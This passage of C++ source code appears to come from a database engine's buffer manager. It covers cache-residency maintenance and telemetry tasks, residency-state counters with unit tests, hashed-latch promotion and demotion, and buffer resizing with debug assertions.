if ( DtickDelta( g_tickLastUpdateStatisticsRequest, tickNow ) >= dtickMaintCacheResidencyPeriod / 10 )
{
g_tickLastUpdateStatisticsRequest = tickNow;
}
// quick check to see if we can schedule a task
if ( DtickDelta( g_tickLastUpdateStatistics, tickNow ) >= dtickMaintCacheResidencyTooOld &&
AtomicCompareExchange( &g_fUpdateStatisticsMayRequest, fTrue, fFalse ) == fTrue )
{
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheResidencyITask,
NULL,
dtickMaintCacheResidencyPeriod,
0 ) < JET_errSuccess )
{
// if we are quiescing to terminate BF, don't re-enable scheduling tasks.
if ( g_fMaintCacheResidencyInit )
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
}
}
}
}
// BFIMaintCacheResidencyITask(): the cache residency maintenance task.
//
// o Heavy-lifting is accomplished by ErrBFICacheUpdateStatistics(), which builds a bitmap
// of whether buffers are resident in memory;
//
// o Quiesces itself when the last interest party expressed its interest longer than
// a certain threshold ago.
void BFIMaintCacheResidencyITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
Assert( !g_fUpdateStatisticsMayRequest );
(void)ErrBFICacheUpdateStatistics();
// should we quiesce the task?
const ERR errForceQuiesce = ErrFaultInjection( 54947 );
if ( DtickDelta( g_tickLastUpdateStatisticsRequest, TickOSTimeCurrent() ) >= dtickMaintCacheResidencyQuiesce ||
errForceQuiesce != JET_errSuccess ||
!( g_fEnabledCacheResidencyTask = !FUtilSystemRestrictIdleActivity() )
)
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
else if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheResidencyITask,
NULL,
dtickMaintCacheResidencyPeriod,
0 ) < JET_errSuccess )
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
}
INLINE void BFIUpdateResidencyStatsAfterResidencyFlag( const BFResidenceState bfrsOld, const BFResidenceState bfrsNew )
{
// Unexpected parameters.
Expected( bfrsOld != bfrsMax );
Expected( bfrsNew != bfrsMax );
// Unexpected transitions.
Expected( !( bfrsOld == bfrsNotCommitted && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsNewlyCommitted && bfrsNew == bfrsNewlyCommitted ) );
Expected( !( bfrsOld == bfrsNewlyCommitted && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsNotResident && bfrsNew == bfrsNewlyCommitted ) );
Expected( !( bfrsOld == bfrsNotResident && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsResident && bfrsNew == bfrsNewlyCommitted ) );
// Same state. Bail out.
if ( bfrsOld == bfrsNew )
{
return;
}
// Need to update g_cbfCommitted.
if ( bfrsNew == bfrsNotCommitted )
{
// Subtract.
AtomicDecrement( (LONG*)&g_cbfCommitted );
}
else if ( bfrsOld == bfrsNotCommitted )
{
// Add.
AtomicIncrement( (LONG*)&g_cbfCommitted );
}
// Need to update g_cbfNewlyCommitted.
if ( bfrsNew == bfrsNewlyCommitted )
{
// Add.
AtomicIncrement( (LONG*)&g_cbfNewlyCommitted );
}
else if ( bfrsOld == bfrsNewlyCommitted )
{
// Subtract.
AtomicDecrement( (LONG*)&g_cbfNewlyCommitted );
}
// Need to update g_cbfCacheResident.
if ( bfrsNew == bfrsResident )
{
// Add.
AtomicIncrement( &g_cbfCacheResident );
}
else if ( bfrsOld == bfrsResident )
{
// Subtract.
AtomicDecrement( &g_cbfCacheResident );
}
}
INLINE BFResidenceState BfrsBFIUpdateResidentState( PBF const pbf, const BFResidenceState bfrsNew )
{
const BFResidenceState bfrsOld = (BFResidenceState)AtomicExchange( (LONG*)&pbf->bfrs, (LONG)bfrsNew );
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsOld, bfrsNew );
return bfrsOld;
}
INLINE BFResidenceState BfrsBFIUpdateResidentState( PBF const pbf, const BFResidenceState bfrsNew, const BFResidenceState bfrsIfOld )
{
const BFResidenceState bfrsOld = (BFResidenceState)AtomicCompareExchange( (LONG*)&pbf->bfrs, (LONG)bfrsIfOld, (LONG)bfrsNew );
if ( bfrsOld == bfrsIfOld )
{
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsOld, bfrsNew );
}
return bfrsOld;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BFIUpdateResidencyStatsAfterResidencyFlag )
{
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
// bfrsNotCommitted -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotCommitted -> bfrsNewlyCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit + 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotCommitted -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsNewlyCommitted -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNewlyCommitted, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit - 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNewlyCommitted -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNewlyCommitted, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit - 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsNotResident -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotResident, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotResident -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotResident, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsResident -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
// bfrsResident -> bfrsNotResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsNotResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
// bfrsResident -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
}
JETUNITTEST( BF, BfrsBFISwitchBFResidencyFlagForced )
{
BF bf;
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
bf.bfrs = bfrsNotCommitted;
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( &bf, bfrsNewlyCommitted );
CHECK( bfrsOld == bfrsNotCommitted );
CHECK( bf.bfrs == bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit + 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
}
JETUNITTEST( BF, BfrsBFISwitchBFResidencyFlagConditional )
{
BF bf;
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
// no switch expected.
bf.bfrs = bfrsNewlyCommitted;
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOldUnchanged = BfrsBFIUpdateResidentState( &bf, bfrsNotCommitted, bfrsResident );
CHECK( bfrsOldUnchanged == bfrsNewlyCommitted );
CHECK( bf.bfrs == bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// switch expected.
bf.bfrs = bfrsResident;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
const BFResidenceState bfrsOldChanged = BfrsBFIUpdateResidentState( &bf, bfrsNotCommitted, bfrsResident );
CHECK( bfrsOldChanged == bfrsResident );
CHECK( bf.bfrs == bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
}
#endif // ENABLE_JET_UNIT_TEST
// Cache telemetry
POSTIMERTASK g_posttBFIMaintTelemetryITask = NULL;
void BFIMaintTelemetryRequest()
{
// if the trace isn't enabled then do not generate telemetry
if ( !( FOSEventTraceEnabled< _etguidCacheMemoryUsage >() ||
(BOOL)UlConfigOverrideInjection( 56322, fFalse ) ) )
{
return;
}
// generate telemetry one time period from now
(VOID)ErrBFIMaintScheduleTask(
g_posttBFIMaintTelemetryITask,
NULL,
dtickTelemetryPeriod,
0);
}
void BFIMaintTelemetryITask( VOID *, VOID * pvContext )
{
// compute the cache footprint by ifmp, tce
LONGLONG** rgrgcbCacheByIfmpTce = new LONGLONG*[ g_ifmpMax ];
TICK** rgrgtickMinByIfmpTce = new TICK*[ g_ifmpMax ];
for ( IFMP ifmpT = 0; ifmpT < g_ifmpMax; ifmpT++ )
{
rgrgcbCacheByIfmpTce[ ifmpT ] = NULL;
rgrgtickMinByIfmpTce[ ifmpT ] = NULL;
}
const TICK tickNow = TickOSTimeCurrent();
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// only inspect pages we can immediately s latch to ensure data quality
if ( pbf->sxwl.ErrTryAcquireSharedLatch() != CSXWLatch::ERR::errSuccess )
{
continue;
}
IFMP ifmp = pbf->ifmp;
// only inspect cached pages that are fully resident
if ( ifmp == ifmpNil || pbf->pgno == pgnoNull || pbf->bfrs != bfrsResident )
{
pbf->sxwl.ReleaseSharedLatch();
continue;
}
// defer allocate our storage
if ( rgrgcbCacheByIfmpTce[ ifmp ] == NULL )
{
rgrgcbCacheByIfmpTce[ ifmp ] = new LONGLONG[ tceMax ];
rgrgtickMinByIfmpTce[ ifmp ] = new TICK[ tceMax ];
for ( int tceT = 0; tceT < tceMax; tceT++ )
{
rgrgcbCacheByIfmpTce[ ifmp ][ tceT ] = 0;
rgrgtickMinByIfmpTce[ ifmp ][ tceT ] = tickNow;
}
}
// track the space consumed by ifmp and tce
rgrgcbCacheByIfmpTce[ ifmp ][ pbf->tce ] += g_rgcbPageSize[ pbf->icbBuffer ];
// only track the last touch time for buffers cached for normal use and that aren't held over for any other
// reason (e.g. dirty and cannot be flushed) because we are trying to find the natural reference interval
if ( pbf->lrukic.FSuperColded() == fFalse && pbf->bfdf <= bfdfUntidy )
{
rgrgtickMinByIfmpTce[ ifmp ][ pbf->tce ] = TickMin( rgrgtickMinByIfmpTce[ ifmp ][ pbf->tce ],
pbf->lrukic.TickLastTouchTime() );
}
pbf->sxwl.ReleaseSharedLatch();
}
// emit telemetry reflecting this cache footprint
for ( IFMP ifmp = 0; ifmp < g_ifmpMax; ifmp++ )
{
if ( !rgrgcbCacheByIfmpTce[ ifmp ] )
{
continue;
}
FMP* pfmp = &g_rgfmp[ ifmp ];
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
for ( TCE tce = 0; tce < tceMax; tce++ )
{
if ( rgrgcbCacheByIfmpTce[ ifmp ][ tce ] == 0 )
{
continue;
}
ETCacheMemoryUsage(
pfmp->WszDatabaseName(),
tce,
PinstFromIfmp( ifmp )->FRecovering() ? iofileDbRecovery : iofileDbAttached,
ifmp,
rgrgcbCacheByIfmpTce[ ifmp ][ tce ],
TickCmp( tickNow, rgrgtickMinByIfmpTce[ ifmp ][ tce ] ) >= 0 ?
DtickDelta( rgrgtickMinByIfmpTce[ ifmp ][ tce ], tickNow ) :
0 );
}
}
pfmp->LeaveBFContextAsReader();
}
// release our resources
for ( IFMP ifmpT = 0; ifmpT < g_ifmpMax; ifmpT++ )
{
delete[] rgrgcbCacheByIfmpTce[ ifmpT ];
delete[] rgrgtickMinByIfmpTce[ ifmpT ];
}
delete[] rgrgcbCacheByIfmpTce;
delete[] rgrgtickMinByIfmpTce;
// schedule our next telemetry
BFIMaintTelemetryRequest();
}
// Internal Functions
// Hashed Latch
#ifdef DEBUG
INLINE BOOL FBFILatchValidContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
BFHashedLatch* const pbfhl = (BFHashedLatch*)( dwContext ^ 1 );
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
PLS* const ppls = Ppls( iProc );
if ( ppls->rgBFHashedLatch <= pbfhl && pbfhl < ppls->rgBFHashedLatch + cBFHashedLatch &&
( DWORD_PTR( pbfhl ) - DWORD_PTR( ppls->rgBFHashedLatch ) ) % sizeof( BFHashedLatch ) == 0 )
{
return fTrue;
}
}
return fFalse;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return FBFICacheValidPbf( PBF( dwContext ) );
}
}
#endif // DEBUG
INLINE PBF PbfBFILatchContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
return ((BFHashedLatch*)( dwContext ^ 1 ))->pbf;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return PBF( dwContext );
}
}
INLINE CSXWLatch* PsxwlBFILatchContext( const DWORD_PTR dwContext )
{
// if the least significant bit is set in the latch context then it
// contains a pointer to the BFHashedLatch that is latched
if ( dwContext & 1 )
{
return &((BFHashedLatch*)( dwContext ^ 1 ))->sxwl;
}
// if the least significant bit is clear in the latch context then it
// contains a pointer to the BF that is latched
else
{
return &PBF( dwContext )->sxwl;
}
}
void BFILatchNominate( const PBF pbf )
{
// we should not have the exclusive latch or write latch on this BF
Assert( pbf->sxwl.FNotOwnExclusiveLatch() && pbf->sxwl.FNotOwnWriteLatch() );
Assert( pbf->bfat == bfatFracCommit );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// disable ownership tracking because we abuse the exclusive latch below
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
// the BF has a normal latch, is eligible to be nominated, and can be
// locked for nomination
if ( pbf->bfls == bflsNormal &&
TickCmp( TickOSTimeCurrent(), pbf->tickEligibleForNomination ) > 0 &&
g_bflruk.FSuperHotResource( pbf ) &&
pbf->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
// the BF is locked and still has a normal latch
if ( pbf->bfls == bflsNormal )
{
// try to allocate a nominee slot for this BF (don't use slot 0!)
PLS* const ppls = Ppls();
size_t iNominee;
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
if ( ppls->rgBFNominee[ iNominee ].pbf == pbfNil )
{
if ( AtomicCompareExchangePointer( (void**)&Ppls( 0 )->rgBFNominee[ iNominee ].pbf,
pbfNil,
pbf ) == pbfNil )
{
break;
}
}
}
// we got a nominee slot
if ( iNominee < cBFNominee )
{
// setup the nominee slot for each processor
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFNominee* const pbfn = &Ppls( iProc )->rgBFNominee[ iNominee ];
pbfn->pbf = pbf;
}
// mark the BF as a nominee
Assert( bflsNominee1 <= iNominee && iNominee <= bflsNominee3 );
pbf->bfls = iNominee;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s nominated and placed in slot %d", OSFormatPointer( pbf ), (ULONG)iNominee ) );
}
// we did not get a nominee slot
else
{
// prevent any further attempts to nominate this BF until nominee
// slots become available again
pbf->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickMaintHashedLatchesPeriod );
}
}
// unlock the BF
pbf->sxwl.ReleaseExclusiveLatch();
}
// we're done abusing the exclusive latch now
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// if the BF is a nominee then vote for it to be promoted to a hashed latch
const BFLatchState bfls = BFLatchState( pbf->bfls );
if ( bflsNominee1 <= bfls && bfls <= bflsNominee3 )
{
Ppls()->rgBFNominee[ bfls ].cCacheReq++;
}
#endif // MINIMAL_FUNCTIONALITY
}
BOOL FBFILatchDemote( const PBF pbf )
{
// we should have the exclusive latch or the write latch on this BF
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then try to demote the BF to a normal
// latch
if ( pbf->bfls == bflsHashed )
{
Assert( pbf->bfat == bfatFracCommit );
// remember which hashed latch this BF currently owns
const ULONG iHashedLatch = pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
// try to acquire the write latch on all the hashed latch for all
// processors
size_t iProc;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ].sxwl;
if ( psxwlProc->ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errLatchConflict )
{
break;
}
}
// we got all the latches
if ( iProc == cProcs )
{
// turn off hashed latch mode for this BF
pbf->bfls = bflsNormal;
// make the BF eligible for nomination
pbf->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() );
// reset the hashed latch for each processor
for ( size_t iProc3 = 0; iProc3 < cProcs; iProc3++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc3 )->rgBFHashedLatch[ iHashedLatch ];
pbfhl->pbf = pbfNil;
}
}
// release all the latches we acquired
for ( size_t iProc2 = 0; iProc2 < iProc; iProc2++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc2 )->rgBFHashedLatch[ iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// we succeeded if the BF is no longer in hashed latch mode
return pbf->bfls != bflsHashed;
}
// BF FMP Context
ERR ErrBFISetupBFFMPContext( IFMP ifmp )
{
ERR err = JET_errSuccess;
FMP* pfmp = &g_rgfmp[ifmp];
if ( !pfmp->FBFContext() )
{
pfmp->EnterBFContextAsWriter();
if ( !pfmp->FBFContext() )
{
BYTE* rgbBFFMPContext = (BYTE*)PvOSMemoryHeapAllocAlign( sizeof( BFFMPContext ), cbCacheLine );
if ( !rgbBFFMPContext )
{
pfmp->LeaveBFContextAsWriter();
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
BFFMPContext* pbffmp = new(rgbBFFMPContext)BFFMPContext();
Assert( UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ) >= lgenCheckpointTooDeepMin );
Assert( UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ) <= lgenCheckpointTooDeepMax );
LGPOS lgposFileSize = { 0, 0, 1 };
BFOB0::ERR errOB0 = pbffmp->bfob0.ErrInit(
BFIOB0Offset( ifmp, &lgposFileSize ) * 2 * (LONG)UlParam( PinstFromIfmp( ifmp ), JET_paramCheckpointTooDeep ),
cbCheckpointTooDeepUncertainty,
g_dblBFSpeedSizeTradeoff );
if ( errOB0 != BFOB0::ERR::errSuccess )
{
Assert( errOB0 == BFOB0::ERR::errOutOfMemory );
pbffmp->BFFMPContext::~BFFMPContext();
OSMemoryHeapFreeAlign( pbffmp );
pfmp->LeaveBFContextAsWriter();
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
DWORD_PTR rgp[2] = { ifmp, (DWORD_PTR)pbffmp };
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfCreateContext | sysosrtlContextFmp, pfmp, rgp, sizeof( rgp ) );
pbffmp->fCurrentlyAttached = fTrue;
pfmp->SetDwBFContext( DWORD_PTR( pbffmp ) );
}
pfmp->LeaveBFContextAsWriter();
}
HandleError:
return err;
}
// Page Manipulation
ERR ErrBFISetBufferSize( __inout PBF pbf, __in const ICBPage icbNewSize, __in const BOOL fWait )
{
ERR err = JET_errSuccess;
Enforce( icbPageInvalid != icbNewSize );
Assert( pbf->sxwl.FOwnWriteLatch() );
if ( BoolParam( JET_paramEnableViewCache ) )
{
Assert( pbf->icbBuffer == icbNewSize );
}
const size_t cbBufferOld = g_rgcbPageSize[pbf->icbBuffer];
const size_t cbBufferNew = g_rgcbPageSize[icbNewSize];
if ( cbBufferNew < cbBufferOld )
{
// Shrinking the buffer
// set the buffer to the requested size ...
if ( pbf->bfat == bfatFracCommit )
{
// Note: This will not be able to be checked if we ever move to an inst specific
// param for ViewCache because we could be reclaiming the buffer from another inst
// at this point.
Expected( !BoolParam( JET_paramEnableViewCache ) );
Assert( 0 == ( cbBufferOld % OSMemoryPageCommitGranularity() ) );
Assert( 0 == ( cbBufferNew % OSMemoryPageCommitGranularity() ) );
// we need to reset the portion of the buffer past the existing buffer
Assert( (INT)cbBufferOld - (INT)cbBufferNew > 0 );
Assert( 0 == ( ( (INT)cbBufferOld - (INT)cbBufferNew ) % OSMemoryPageCommitGranularity() ) );
// originally we planned to only decommit in debug, and simple reset and toss
// the page in free, but testing shows decommit uses signficantly less CPU (both
// kernel and user mode).
OSMemoryPageDecommit( ((BYTE*)((pbf)->pv))+cbBufferNew, cbBufferOld - cbBufferNew );
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( -( (LONG_PTR)( cbBufferOld - cbBufferNew ) ) ) );
Assert( cbCacheCommittedSizeInitial >= (LONG_PTR)( cbBufferOld - cbBufferNew ) );
// we only need to update this if the buffer is not available and not quiesced.
// only cached buffers are tracked.
if ( !pbf->fAvailable && !pbf->fQuiesced )
{
Assert( ( cbBufferOld != 0 ) && ( cbBufferNew != 0 ) ); // Fully dehydrated buffers are never considered to be in use.
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
AtomicIncrement( &g_rgcbfCachePages[icbNewSize] );
Assert( g_rgcbfCachePages[icbNewSize] > 0 );
}
Assert( !pbf->fQuiesced || ( icbNewSize == icbPage0 ) ); // All quiesced buffers must be fully dehydrated.
Expected( ( icbNewSize != icbPage0 ) || pbf->fQuiesced || pbf->fAvailable ); // Fully dehydrated buffers are expected to be either quiesced or in the avail pool.
pbf->icbBuffer = icbNewSize;
}
}
else if ( cbBufferNew > cbBufferOld )
{
// Growing the buffer
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( fWait )
{
const LONG cRFSCountdownOld = RFSThreadDisable( 10 );
while( !FOSMemoryPageCommit( ((BYTE*)((pbf)->pv))+cbBufferOld, cbBufferNew - cbBufferOld ) )
{
// ugh! do it again, we've got no choice ...
}
RFSThreadReEnable( cRFSCountdownOld );
}
else if ( !FOSMemoryPageCommit( ((BYTE*)((pbf)->pv))+cbBufferOld, cbBufferNew - cbBufferOld ) )
{
Error( ErrERRCheck( JET_errOutOfMemory ) );
}
FOSSetCleanupState( fCleanUpStateSaved );
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( cbBufferNew - cbBufferOld ) );
Assert( cbCacheCommittedSizeInitial >= 0 );
// we only need to update this if the buffer is not available and not quiesced.
// only cached buffers are tracked.
if ( !pbf->fAvailable && !pbf->fQuiesced )
{
Assert( ( cbBufferOld != 0 ) && ( cbBufferNew != 0 ) ); // Fully dehydrated buffers are never considered to be in use.
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
AtomicIncrement( &g_rgcbfCachePages[icbNewSize] );
Assert( g_rgcbfCachePages[icbNewSize] > 0 );
}
// all buffers growing from 0 are expected to be in the avail pool, after being unquiesced
Expected( ( pbf->icbBuffer != icbPage0 ) || pbf->fAvailable );
pbf->icbBuffer = icbNewSize;
BFIFaultInBuffer( pbf->pv, g_rgcbPageSize[icbNewSize] );
}
else
{
// else ... cache counters are right, buffer size is right ...
FireWall( "UnnecessaryBufferSizeChange" );
}
Assert( pbf->icbBuffer == icbNewSize );
HandleError:
if ( err != JET_errSuccess )
{
Assert( ( err == JET_errOutOfMemory ) && ( cbBufferNew > cbBufferOld ) && !fWait );
}
return err;
}
#ifdef DEBUG
void BFIAssertNewlyAllocatedPage( const PBF pbfNew, const BOOL fAvailPoolAdd )
{
Assert( pbfNew );
// The BF lifecycle is complex because we re-use buffers, so it can go
// from: unallocated -> allocated memory[0] -> freed to avail pool[1]
// -> in use / clean -> in use / dirty -> in use / clean
// -> freed to avail pool[2] -> in use / clean -> freed again[3]
// -> quiesced -> deallocated memory.
//
// And for each case when it enters the avail pool or gets pulled out (at [1],
// [2], [3]) to be put in use, we want the page to be as fresh as when it
// was newly allocated at [0]/[1].
//
// This function is for validating a BF's initial state is in a newly allocated
// state. You can assume these are true at ErrBFIAllocPage() ... but to be
// defensive and catch issues early, we'll also check this state on entry into
// the avail pool at [1] and re-entry at [2], and exit at [3].
// Very definition of an allocated page, is NOT available
Assert( !pbfNew->fAvailable );
Assert( FBFIValidPvAllocType( pbfNew ) );
Assert( pbfNew->bfat == bfatFracCommit || ( UlParam( JET_paramEnableViewCache ) && pbfNew->bfat == bfatNone ) );
Assert( UlParam( JET_paramEnableViewCache ) || ( pbfNew->pv != NULL ) );
Assert( pbfNew->ifmp == ifmpNil ); // should not belong to any attached DB.
Assert( pbfNew->err == JET_errSuccess );
Assert( !pbfNew->bfbitfield.FRangeLocked() );
Assert( pbfNew->pWriteSignalComplete == NULL ); // should not be undergoing a write IO
Assert( PvBFIAcquireIOContext( pbfNew ) == NULL ); // should not be undergoing any IO
Assert( pbfNew->prceUndoInfoNext == prceNil ); // verstore info should be reset
Assert( !pbfNew->fNewlyEvicted || fAvailPoolAdd );
Assert( !pbfNew->fCurrentVersion ); // version info should be reset
Assert( !pbfNew->fOlderVersion );
Assert( !pbfNew->bfbitfield.FDependentPurged() );
Assert( pbfNew->pbfTimeDepChainPrev == pbfNil );
Assert( pbfNew->pbfTimeDepChainNext == pbfNil );
Assert( !pbfNew->fAbandoned );
Assert( !pbfNew->fWARLatch ); // latch state should be clean
Assert( pbfNew->bfdf == bfdfClean ); // should be in a clean state (bfdf, lgpos's, etc)
Assert( 0 == CmpLgpos( &(pbfNew->lgposModify), &lgposMin ) );
